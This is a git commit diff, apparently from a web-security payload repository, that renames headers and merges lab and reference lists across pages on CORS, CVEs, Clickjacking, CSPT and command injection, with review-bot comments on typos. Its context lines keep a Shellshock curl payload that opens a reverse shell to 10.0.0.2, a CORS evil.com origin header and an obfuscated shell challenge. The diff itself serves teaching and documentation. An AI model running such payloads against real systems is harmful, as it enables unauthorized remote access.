Normalize page header for API, CSPT, CORS, CSRF

This commit is contained in:
Swissky 2024-11-09 23:01:39 +01:00
parent c82cd6408a
commit d80f73a829
10 changed files with 135 additions and 90 deletions

View File

@ -16,12 +16,6 @@
* [References](#references)
**Requirements**
* `__VIEWSTATE`
* `__VIEWSTATEGENERATOR`*
## Viewstate Format
ViewState in IIS is a technique used to retain the state of web controls between postbacks in ASP.NET applications. It stores data in a hidden field on the page, allowing the page to maintain user input and other state information.
@ -135,6 +129,12 @@ List of interesting machine keys to use:
First you need to decode the Viewstate to know if the MAC and the encryption are enabled.
**Requirements**
* `__VIEWSTATE`
* `__VIEWSTATEGENERATOR`
### MAC Is Not Enabled
```ps1
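Review bot: the Requirements list removed in the previous hunk had a trailing `*` after `__VIEWSTATEGENERATOR`, and this hunk re-adds the list without it. If the asterisk meant the generator value is optional, state that in words (e.g. "`__VIEWSTATEGENERATOR` (optional)") rather than dropping the marker silently; moving the list next to "First you need to decode the Viewstate" is otherwise the right place for it.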

View File

@ -2,13 +2,21 @@
> A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attackers site using the victims credentials.
## Summary
* [Tools](#tools)
* [Prerequisites](#prerequisites)
* [Requirements](#requirements)
* [Exploitation](#exploitation)
* [Origin Reflection](#origin-reflection)
* [Null Origin](#null-origin)
* [XSS on Trusted Origin](#xss-on-trusted-origin)
* [Wildcard Origin `*` without Credentials](#wildcard-origin--without-credentials)
* [Expanding the Origin](#expanding-the-origin)
* [Labs](#labs)
* [References](#references)
## Tools
* [s0md3v/Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3v/Corsy/)
@ -17,17 +25,19 @@
* [trufflesecurity/of-cors - Exploit CORS misconfigurations on the internal networks](https://github.com/trufflesecurity/of-cors)
* [omranisecurity/CorsOne - Fast CORS Misconfiguration Discovery Tool](https://github.com/omranisecurity/CorsOne)
## Prerequisites
## Requirements
* BURP HEADER> `Origin: https://evil.com`
* VICTIM HEADER> `Access-Control-Allow-Credential: true`
* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null`
## Exploitation
Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target `https://victim.example.com/endpoint`.
### Vulnerable Example: Origin Reflection
### Origin Reflection
#### Vulnerable Implementation
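Review bot: the context line `VICTIM HEADER> Access-Control-Allow-Credential: true` misspells the response header; the real name is `Access-Control-Allow-Credentials` (plural), and anyone matching on the literal string will miss it. Since this hunk already renames the section from Prerequisites to Requirements (which makes it agree with the `#requirements` Summary link), fix the spelling in the same change.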
@ -87,7 +97,7 @@ or
</html>
```
### Vulnerable Example: Null Origin
### Null Origin
#### Vulnerable Implementation
@ -128,7 +138,7 @@ origin in the request:
</script>"></iframe>
```
### Vulnerable Example: XSS on Trusted Origin
### XSS on Trusted Origin
If the application does implement a strict whitelist of allowed origins, the
exploit codes from above do not work. But if you have an XSS on a trusted
@ -139,7 +149,7 @@ again.
https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script>
```
### Vulnerable Example: Wildcard Origin `*` without Credentials
### Wildcard Origin `*` without Credentials
If the server responds with a wildcard origin `*`, **the browser does never send
the cookies**. However, if the server does not require authentication, it's still
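Review bot: the kept intro line reads `**the browser does never send the cookies**`; while the heading is being renamed here, reword it to `**the browser never sends the cookies**`.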
@ -178,7 +188,9 @@ function reqListener() {
};
```
### Vulnerable Example: Expanding the Origin / Regex Issues
### Expanding the Origin
Occasionally, certain expansions of the original origin are not filtered on the server side. This might be caused by using a badly implemented regular expressions to validate the origin header.
#### Vulnerable Implementation (Example 1)
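Review bot: dropping `/ Regex Issues` from the heading removes the only heading-level mention of the root cause, so the intro line has to carry it; keep the regex wording there and fix its grammar: `using a badly implemented regular expressions` should be `using badly implemented regular expressions` (or `a badly implemented regular expression`).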
@ -247,26 +259,25 @@ function reqListener() {
};
```
## Labs
* [CORS vulnerability with basic origin reflection](https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack)
* [CORS vulnerability with trusted null origin](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack)
* [CORS vulnerability with trusted insecure protocols](https://portswigger.net/web-security/cors/lab-breaking-https-attack)
* [CORS vulnerability with internal network pivot attack](https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack)
* [PortSwigger - CORS vulnerability with basic origin reflection](https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack)
* [PortSwigger - CORS vulnerability with trusted null origin](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack)
* [PortSwigger - CORS vulnerability with trusted insecure protocols](https://portswigger.net/web-security/cors/lab-breaking-https-attack)
* [PortSwigger - CORS vulnerability with internal network pivot attack](https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack)
## Bug Bounty reports
* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147)
* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200)
* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249)
* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298)
## References
- [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
- [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7) - December 20, 2018](https://hackerone.com/reports/470298)
- [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://web.archive.org/web/20190516052453/https://www.corben.io/advanced-cors-techniques/)
- [CORS misconfig | Account Takeover - Rohan (nahoragg) - October 20, 2018](https://hackerone.com/reports/426147)
- [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t) - October 29, 2018](https://hackerone.com/reports/430249)
- [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax) - September 15, 2016](https://hackerone.com/reports/168574)
- [CORS Misconfigurations Explained - Detectify Blog - Apr 26, 2018](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/)
- [Cross-origin resource sharing (CORS) - PortSwigger Web Security Academy - December 30, 2019](https://portswigger.net/web-security/cors)
- [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy) - June 1, 2017](https://hackerone.com/reports/235200)
- [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle - 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
- [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - December 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
- [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://web.archive.org/web/20190516052453/https://www.corben.io/advanced-cors-techniques/)
- [Cross-origin resource sharing (CORS) - PortSwigger Web Security Academy - December 30, 2019](https://portswigger.net/web-security/cors)
- [CORS Misconfigurations Explained - Detectify Blog - Apr 26, 2018](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/)
- [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
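Review bot: the merged References list mixes three date styles (`May 14 2019`, `14 October 2016`, `Apr 26, 2018`) while the template updated in this same commit prescribes `Month XX, 202X`; normalize them here since this is the normalization pass. Folding the Bug Bounty reports into References and dropping the four duplicated entries at the end is consistent with the Summary in this file's first hunk, which no longer lists a Bug Bounty reports section.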

View File

@ -112,7 +112,7 @@ Remainder:
## Labs
* [Lab: HTTP/2 request splitting via CRLF injection - PortSwigger](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection)
* [PortSwigger - HTTP/2 request splitting via CRLF injection](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection)
## References

View File

@ -1,5 +1,21 @@
# Common Vulnerabilities and Exposures
A CVE (Common Vulnerabilities and Exposures) is a unique identifier assigned to a publicly known cybersecurity vulnerability. CVEs help standardize the naming and tracking of vulnerabilities, making it easier for organizations, security professionals, and software vendors to share information and manage risks associated with these vulnerabilities. Each CVE entry includes a brief description of the vulnerability, its potential impact, and details about affected software or systems.
## Summary
* [Tools](#tools)
* [Big CVEs in the last 15 years](#big-cves-in-the-last-15-years)
* [CVE-2017-0144 - EternalBlue](#cve-2017-0144---eternalblue)
* [CVE-2017-5638 - Apache Struts 2](#cve-2017-5638---apache-struts-2)
* [CVE-2018-7600 - Drupalgeddon 2](#cve-2018-7600---drupalgeddon-2)
* [CVE-2019-0708 - BlueKeep](#cve-2019-0708---bluekeep)
* [CVE-2019-19781 - Citrix ADC Netscaler](#cve-2019-19781---citrix-adc-netscaler)
* [CVE-2014-0160 - Heartbleed](#cve-2014-0160---heartbleed)
* [CVE-2014-6271 - Shellshock](#cve-2014-6271---shellshock)
* [References](#references)
## Tools
- [Trickest CVE Repository - Automated collection of CVEs and PoC's](https://github.com/trickest/cve)
@ -8,7 +24,7 @@
- [CVE Details - The ultimate security vulnerability datasource](https://www.cvedetails.com)
## Big CVEs in the last 5 years.
## Big CVEs in the last 15 years
### CVE-2017-0144 - EternalBlue
@ -24,18 +40,22 @@ Afftected systems:
- Windows 10 Gold, 1511, and 1607
- Windows Server 2016
### CVE-2017-5638 - Apache Struts 2
On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header.
### CVE-2018-7600 - Drupalgeddon 2
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.
### CVE-2019-0708 - BlueKeep
A remote code execution vulnerability exists in Remote Desktop Services formerly known as Terminal Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
### CVE-2019-19781 - Citrix ADC Netscaler
A remote code execution vulnerability in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.
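Review bot: the hunk header's context `Afftected systems:` is a typo for `Affected systems:` (the next hunk's `Affected products:` is spelled correctly), and the Struts paragraph's `On March 6th` carries no year, which reads oddly under a "last 15 years" heading; CVE-2017-5638 was published on March 6, 2017, so write `On March 6th, 2017`.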
@ -47,12 +67,12 @@ Affected products:
- Citrix ADC and NetScaler Gateway version 11.1 all supported builds
- Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds
## Older, but not forgotten
### CVE-2014-0160 - Heartbleed
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
### CVE-2014-6271 - Shellshock
Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.
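Review bot: removing `## Older, but not forgotten` folds Heartbleed and Shellshock under the renamed `Big CVEs in the last 15 years` heading, which matches the new Summary; while here, `a family of security bug` on the Shellshock line should be `a family of security bugs`.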
@ -62,7 +82,8 @@ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 10.0
curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/4444 0>&1" "https://10.0.0.1/cgi-bin/admin.cgi"
```
## Thanks to
## References
* [Heartbleed - Official website](http://heartbleed.com)
* [Shellshock - Wikipedia](https://en.wikipedia.org/wiki/Shellshock_(software_bug))

View File

@ -1,9 +1,6 @@
# Clickjacking
> Clickjacking is a type of web security vulnerability where a malicious website tricks a user into clicking on something different from what the user perceives,
> potentially causing the user to perform unintended actions without their knowledge or consent. Users are tricked into performing all sorts of unintended actions
> as such as typing in the password, clicking on Delete my account button, liking a post, deleting a post, commenting on a blog. In other words all the actions
> that a normal user can do on a legitimate website can be done using clickjacking.
> Clickjacking is a type of web security vulnerability where a malicious website tricks a user into clicking on something different from what the user perceives, potentially causing the user to perform unintended actions without their knowledge or consent. Users are tricked into performing all sorts of unintended actions as such as typing in the password, clicking on Delete my account button, liking a post, deleting a post, commenting on a blog. In other words all the actions that a normal user can do on a legitimate website can be done using clickjacking.
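Review bot: the reflowed quote keeps the grammatical slip `as such as typing in the password`; since the line is being rewritten anyway, change it to `such as typing in the password`, and quote the button label: `clicking on the "Delete my account" button`.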
## Summary
@ -22,8 +19,8 @@
* [IE8 XSS filter](#ie8-xss-filter)
* [Chrome 4.0 XSSAuditor filter](#chrome-40-xssauditor-filter)
* [Challenge](#challenge)
* [Practice Environments](#practice-environments)
* [Reference](#references)
* [Labs](#labs)
* [References](#references)
## Tools
@ -229,10 +226,10 @@ Inspect the following code:
Determine the Clickjacking vulnerability within this code snippet. Identify how the hidden iframe is being used to exploit the user's actions when they click the button, leading them to a malicious website.
## Practice Environments
## Labs
* [OWASP WebGoat](https://owasp.org/www-project-webgoat/)
* [Client Side Clickjacking Test](https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/09-Testing_for_Clickjacking)
* [OWASP Client Side Clickjacking Test](https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/09-Testing_for_Clickjacking)
## References

View File

@ -1,15 +1,18 @@
# Client Side Path Traversal
Client-Side Path Traversal (CSPT), sometimes also referred to as "On-site Request Forgery," is a vulnerability that can be exploited as a tool for CSRF or XSS attacks.
It takes advantage of the client side's ability to make requests using fetch to a URL, where multiple "../" characters can be injected. After normalization, these characters redirect the request to a different URL, potentially leading to security breaches.
Since every request is initiated from within the frontend of the application, the browser automatically includes cookies and other authentication mechanisms, making them available for exploitation in these attacks.
> Client-Side Path Traversal (CSPT), sometimes also referred to as "On-site Request Forgery," is a vulnerability that can be exploited as a tool for CSRF or XSS attacks.
> It takes advantage of the client side's ability to make requests using fetch to a URL, where multiple "../" characters can be injected. After normalization, these characters redirect the request to a different URL, potentially leading to security breaches.
> Since every request is initiated from within the frontend of the application, the browser automatically includes cookies and other authentication mechanisms, making them available for exploitation in these attacks.
## Summary
* [Tools](#tools)
* [Lab](#lab)
* [CSPT to XSS](#cspt-to-xss)
* [CSPT to CSRF](#cspt-to-xss)
* [Labs](#labs)
* [References](#references)
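Review bot: the Summary entry `* [CSPT to CSRF](#cspt-to-xss)` points at the XSS section's anchor; it should be `(#cspt-to-csrf)` to match the heading it names. Removing the `[Lab](#lab)` entry is consistent with the `## Lab` section being moved to `## Labs` later in this file.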
@ -18,11 +21,6 @@ Since every request is initiated from within the frontend of the application, th
* [doyensec/CSPTBurpExtension](https://github.com/doyensec/CSPTBurpExtension) - CSPT is an open-source Burp Suite extension to find and exploit Client-Side Path Traversal.
## Lab
* [doyensec/CSPTPlayground](https://github.com/doyensec/CSPTPlayground) - CSPTPlayground is an open-source playground to find and exploit Client-Side Path Traversal (CSPT).
## CSPT to XSS
![](https://matanber.com/images/blog/cspt-query-param.png)
@ -61,6 +59,11 @@ Real-World Scenarios:
* [CVE-2023-5123 : CSPT2CSRF in Grafanas JSON API Plugin](https://medium.com/@maxime.escourbiac/grafana-cve-2023-5123-write-up-74e1be7ef652)
## Labs
* [doyensec/CSPTPlayground](https://github.com/doyensec/CSPTPlayground) - CSPTPlayground is an open-source playground to find and exploit Client-Side Path Traversal (CSPT).
## References
- [Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF - Maxence Schmitt - 02 Jul 2024](https://blog.doyensec.com/2024/07/02/cspt2csrf.html)
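Review bot: the reference date `02 Jul 2024` does not follow the `Month XX, 202X` format set by the updated template (`July 02, 2024`), and the context line `Grafanas JSON API Plugin` is missing its apostrophe (`Grafana's`). Moving the CSPTPlayground entry from `## Lab` to `## Labs` matches the new Summary entry.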

View File

@ -2,6 +2,7 @@
> Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application.
## Summary
* [Tools](#tools)
@ -35,7 +36,7 @@
* [Backgrounding long running commands](#backgrounding-long-running-commands)
* [Remove arguments after the injection](#remove-arguments-after-the-injection)
* [Labs](#labs)
* [Challenge](#challenge)
* [Challenge](#challenge)
* [References](#references)
@ -417,14 +418,14 @@ In Unix-like command-line interfaces, the `--` symbol is used to signify the end
## Labs
* [OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple)
* [Blind OS command injection with time delays](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays)
* [Blind OS command injection with output redirection](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection)
* [Blind OS command injection with out-of-band interaction](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band)
* [Blind OS command injection with out-of-band data exfiltration](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration)
* [PortSwigger - OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple)
* [PortSwigger - Blind OS command injection with time delays](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays)
* [PortSwigger - Blind OS command injection with output redirection](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection)
* [PortSwigger - Blind OS command injection with out-of-band interaction](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band)
* [PortSwigger - Blind OS command injection with out-of-band data exfiltration](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration)
## Challenge
### Challenge
Challenge based on the previous tricks, what does the following command do:
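Review bot: demoting `## Challenge` to `### Challenge` places it under Labs, so the `[Challenge](#challenge)` Summary entry in the earlier hunk should be indented as a sub-item of `[Labs](#labs)`, the way the template in this commit lists challenges under Labs; the `#challenge` anchor itself still resolves after the level change.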
@ -432,6 +433,8 @@ Challenge based on the previous tricks, what does the following command do:
g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
```
**NOTE**: The command is safe to run, but you should not trust me.
## References

View File

@ -20,7 +20,7 @@ Attempting to manipulate SQL queries may have goals including:
* [Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md)
* [HQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/HQL%20Injection.md)
* [DB2 Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/DB2%20Injection.md)
* [SQLmap Cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLmap%20Cheatsheet.md)
* [SQLmap](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLmap%20Cheatsheet.md)
* [Entry point detection](#entry-point-detection)
* [DBMS Identification](#dbms-identification)
* [Authentication bypass](#authentication-bypass)

View File

@ -27,6 +27,7 @@
- [EP004: Bug Hunters | HACKING GOOGLE](https://youtu.be/IoXiXlCNoXg)
- [EP005: Project Zero | HACKING GOOGLE](https://youtu.be/My_13FXODdU)
## Conferences
- [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)

View File

@ -5,18 +5,20 @@
## Summary
* [Tools](#tools)
* [Something](#something)
* [Methodology](#methodology)
* [Subentry 1](#subentry-1)
* [Subentry 2](#subentry-2)
* [Labs](#labs)
* [References](#references)
## Tools
- [Tool 1](https://example.com)
- [Tool 2](https://example.com)
- [username/tool1](https://github.com/username/tool1) - Description of the tool
- [username/tool2](https://github.com/username/tool2) - Description of the tool
## Something
## Methodology
Quick explanation
@ -24,13 +26,20 @@ Quick explanation
Exploit
```
### Subentry 1
### Subentry 2
## Labs
- [Company - Lab 1](#link-to-the-lab)
- [Company - Lab 2](#link-to-the-lab)
- [Company - Challenge 1](#link-to-the-challenge)
- [Company - Challenge 2](#link-to-the-challenge)
## References
- [Blog title - Author, Date](https://example.com)
- [Blog title - Author (@handle) - Month XX, 202X](https://example.com)
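Review bot: the template's Labs and References lists use `-` bullets, but the Labs lists added in this same commit (CORS, CRLF, Clickjacking and Command Injection pages) use `*`, and the CVE page's References use `*` too; pick one marker for the template and the pages it is meant to normalize. The lab placeholders `(#link-to-the-lab)` are in-page anchors rather than URLs, which contradicts the `https://example.com` placeholder style used on the References line.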